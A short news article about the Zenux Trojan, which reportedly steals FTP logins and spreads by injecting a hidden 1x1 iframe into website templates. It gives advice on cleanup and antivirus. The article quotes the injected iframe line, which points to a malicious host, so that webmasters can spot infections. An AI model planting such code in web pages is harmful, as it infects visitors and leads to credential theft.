Many web-pages on the Internet have been infected by a malicious program, called Zenux. This Trojan infects different sites and then spreads through these sites on PCs of the visitors.
Presumably, the Zenux attacks computers and steals all FTP access logins and passwords, and starts copying itself onto web-pages through their FTP-server connections. A chain reaction starts: the more computers are infected, the more FTP access codes are stolen, and thus more computers through respective web-site are infected.
Mainly Russian webmasters have faced this problem. And they still don't know how to deal with the Trojan. It inserts a code into the template of a site and could be seen, for example, as a small square 1 × 1 pixels in the lower left corner of the infected web-page. The piece of an alien code one could see on a web-page should look like this:
<!-- ~ --><iframe src="http://zenux.info/info/index.php" width="1" height="1"><!-- ~ -->
Even when the code is deleted, it comes back later on the page and the only way to defeat the Trojan is to sweep the system clean with an anti-virus program and change all FTP access codes.
The trial version of Kaspersky Internet Security Suite 7.0 has stopped the script, initiated by this piece of code. It is unknown whether other security programs are able to protect the PCs from this Trojan. The least we could say is that NOD32 has let it through.
Powered by www.infoniac.com.